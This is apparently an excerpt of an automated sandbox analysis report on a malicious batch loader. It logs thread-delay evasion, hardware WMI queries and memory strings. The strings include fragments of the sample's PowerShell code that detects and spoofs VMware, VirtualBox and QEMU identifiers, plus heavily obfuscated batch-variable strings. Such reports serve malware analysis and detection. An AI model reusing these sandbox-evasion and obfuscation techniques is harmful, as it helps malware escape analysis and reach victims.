Source: C:\Windows\System32\dllhost.exe TID: 2156	Thread sleep count: 328 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2156	Thread sleep time: -32800s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5988	Thread sleep count: 353 > 30
Source: C:\Windows\System32\svchost.exe TID: 5988	Thread sleep time: -35300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4656	Thread sleep count: 1257 > 30
Source: C:\Windows\System32\svchost.exe TID: 4656	Thread sleep time: -125700s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 5880	Thread sleep count: 337 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 5880	Thread sleep time: -33700s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1ED894 FindFirstFileExW,	8_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D21D894 FindFirstFileExW,	8_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D29DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D29D894 FindFirstFileExW,	8_2_000001CA7D29D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD5D894 FindFirstFileExW,	9_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD8DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD8D894 FindFirstFileExW,	9_2_0000017D2DD8D894
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B92D894 FindFirstFileExW,	12_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_00000262F1C9DA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C9D894 FindFirstFileExW,	14_2_00000262F1C9D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D0D894 FindFirstFileExW,	14_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_00000262F1DFDA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DFD894 FindFirstFileExW,	14_2_00000262F1DFD894
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001C115C7DA18
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C7D894 FindFirstFileExW,	15_2_000001C115C7D894
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001C115CADA18
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CAD894 FindFirstFileExW,	15_2_000001C115CAD894
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	16_2_000001BB497FDA18
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497FD894 FindFirstFileExW,	16_2_000001BB497FD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B1D894 FindFirstFileExW,	19_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E13D894 FindFirstFileExW,	20_2_000002234E13D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E13DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E16D894 FindFirstFileExW,	20_2_000002234E16D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E16DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056DD894 FindFirstFileExW,	21_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF0570D894 FindFirstFileExW,	21_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD7D894 FindFirstFileExW,	22_2_000002287AD7D894
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	22_2_000002287AD7DA18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA9D894 FindFirstFileExW,	23_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	23_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000002520257DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	24_2_000002520257DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000002520257D894 FindFirstFileExW,	24_2_000002520257D894
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	24_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025AD894 FindFirstFileExW,	24_2_00000252025AD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	25_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFCD894 FindFirstFileExW,	25_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC68D894 FindFirstFileExW,	25_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC68DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	25_2_000001A9EC68DA18

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 0000001B.00000000.1616011073.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2769621749.000002A769A42000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 0000001B.00000002.2769621749.000002A769A42000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000016.00000002.2839307197.000002287B013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 0000001B.00000000.1618024236.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 0000001B.00000003.1632715112.000002A76AED2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware(@5$
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dRomNECVMWarVMware_SATA_
Source: svchost.exe, 0000001B.00000000.1618024236.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000014.00000002.2867804708.000002234B534000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2863147572.000002234AE79000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000030.00000002.2752494125.000001E2E425A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NTFS;;SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000030.00000002.2754902148.000001E2E4302000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001B.00000003.1632715112.000002A76AED2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 0000001B.00000002.2872440750.000002A76C100000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: cmd.exe, 0000000F.00000003.1557653935.000001C115A85000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.1557843774.000001C115A85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 0000001B.00000002.2823111724.000002A76A499000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmcir:m
Source: svchost.exe, 0000001B.00000000.1618024236.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 0000001B.00000003.1632715112.000002A76AED2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: cmd.exe, 0000000F.00000003.1542431098.000001C115A6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 00000030.00000002.2754902148.000001E2E4302000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000030.00000002.2751057770.000001E2E4240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: lsass.exe, 00000009.00000002.2764499577.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5D2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001B.00000002.2788776679.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: cmd.exe, 0000000F.00000003.1568558191.000001C115A76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uHUjjkekJpvcFFqLoRiQSkaxsTUOnjrSDyIepQs%c%tdngkwqWHYWxoEuakGwRpppWAYDzgXlvxzPNFdPbbWnQrMcniyyyTYceOqGmSRPKMAZPPGugQvPtbz%b%FNWpqHzNCzwLZoxDijgDdQMmyBerIxiIcoLSqDBhkZYzsdHgJmmGmywObJQODhfeqNIKCEnFIYseSm%w%TuUYIvlCwDSWRGMNEcTTjEuXDeZHXngsWOPwUFzKTNrfSGNGSUupkYdoZWuEvDFiwAadQqTYDjZwnp%=$%WrsOcSQhXKBwXkUopiiIsFJPCbwLbZGbKSymcOCqGscspUVNIUKo%n%fGMrHCmbwegYeALfMHlAGScaDrAIfJdgosVdfgFzCATBleoPiQaa%u%JjHmEMOqcEVMbaJLEIZFcLYfYBOzcLzoJcwfKJzsspxXFhzkuDkA%l%RuYXkCocXpnreGcZEEaUiGnNnbAQbEezAZxpeyViuwvdbgSYeAGQ%l%DqrkhlJicxbtkOQfiNVfIRAMljLhiBMBXoWkIniSOMgXvbTnpNQr%,%FBhLQEYXACZALzwWRGwVFcqWLCrkpxRvLuWwgkudoksmMFlVFXwJ% %qVLCklannOIcLEPqDZPGltGvJekfqvFsbhfQJtlVkgPABpBiPVrF%$%hPxXoqTgbUWSjqbDzZHkOUveDfTtDbpvdZklJhBszfUqkXrlnXJQ%w%ngRntstjxzCZEBOjfQTrypKIafUGOHgFszhXiWRqOrUaDULJiigx%j%errYvinnyNvQtWGftRaiYCDguKffulxGAIBahjBaJESaWeHGoGpr%U%hXyBOlELdiTmqOpKvFXkpazuJCjpdzROVfyDjamWFPWAKFKhPXlI%z%IfbhxeRmboIEqfrkqLAutbFAdYJeSbAgoifPdqffiZUqhsjEozRd%C%wQoHABdyuNuZNCqiaBgZFultgosKOfPskwJxUxpCmGLvFUCEcbEM%)%tRxbEUBmitJpXcPqSSnClEMYJQOlLOINAdYtZHTZWdtTXvyDflLk%"
Source: svchost.exe, 0000001B.00000002.2867817753.000002A76AFCA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 9-4vmci
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: svchost.exe, 00000014.00000000.1582643174.000002234AE79000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: lsass.exe, 00000009.00000002.2757363580.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498242259.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2741546577.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1502576174.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1584093609.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2740015718.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1588412072.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2761571888.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2738255180.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1597118724.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1615958373.000002A769A2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000009.00000002.2764499577.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000030.00000002.2752494125.000001E2E425A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000030.00000000.1747638552.000001E2E422B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmd.exe, 0000000F.00000003.1542431098.000001C115A6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03A11000.00000004.00000001.00020000.00000000.sdmp, Hydra.ccLoader.bat, $rbx-CO2.bat.10.dr	Binary or memory string: !JGaWOdDLMowfHKNJdZbnHtCEuAkQgMwgPxbwNrwRXwwCNVeIJXpRrsnqewBoTMEZRppkJrVLCjqkWZRywBhixFPxkLrrPiXlRxKyFTZsbEohccteFdSsEwCmASZYZEVume! "Y%mIUgzLkqeGMYBJSNppqqwONOfzpCKVuyIcLmKVlUlXwJKYwEVnWNLgAyVgbZvIFimnpzXGcteveysd%Y%dgcLGxZHNCCnrEUlyDsnxxIXGpkCJpcbgRcUWKbhjEANXKpyzSXBfeGFyffrmwXxAAgzBZoOBleSXU%V%ZWZMcQsAVclxwRFKUMHcnwDQWzEiZUaOHDgjrAuheZFeneDxjRqrlVHDsjQCmjBabxPTKvsuszXoQz%F%CRWgZiEJCMVCQiJRUUxFcQoKMNzVYLXsMTHYGfktwsUcXiFjKBEdQlwLDlumIIKRPDQXBLkOKeiKWm%c%MEiplxgUBAwVvuLYKOIdnusHIZrPsMdLPrzPdtwnKVbpBFqPdMuucSYsmAGmfrBPxKgeVWUrrutrsc%K%gdIBMGsIJWsgDDMkhttmRQzlTgRddHzGajuDDDEVxPbjMPsrEgnZYflpExIFOpEbxLfuiiHDPyPcPq%G%zeOAyXuzIUXeZgVYgikZLaJYivzJkzqjAoXDRnQHHYclwdjBIQsHRQEyvPrcyLojEOELisgSrCrNYy%w%CfmXbthIrKJzicWOjWJTGHyytqKzppyQAXnmQAKUbWxTbJjeWDsvefRUGNELJHsbmTZlOKYJmORKjF%n%xJgGDMWdMufsFcVYluDvHiKYpmFJjpnhLbqUEdeFejgEfveVNnDxgNXoZhqqhnTxhXHDLbuhpXqybg%A%SThJVVLQbXebUxMOyRpJwiOAjMTviiwynTowiysXLqWKzKgXvAzzjsJKfGzicqISAFOaipFayrYgmd%p%bzGVaHJXpUkErBYjUuIdkUWfPfVzbRuCxcFaChqbiDqTQDYdbpwDxiTgDAgULkVxAHgoVXGNeGUGEc%x%plgRxLvQeoiyxcavpYHTsiwJhdIIzRnmCAlUOUNkbKCRgwAENIrWZKKgPwJtdMqnbWWWQfHvlxRIFE%X%DKDdVQzrmRQefrktgptoQkAEOHbVL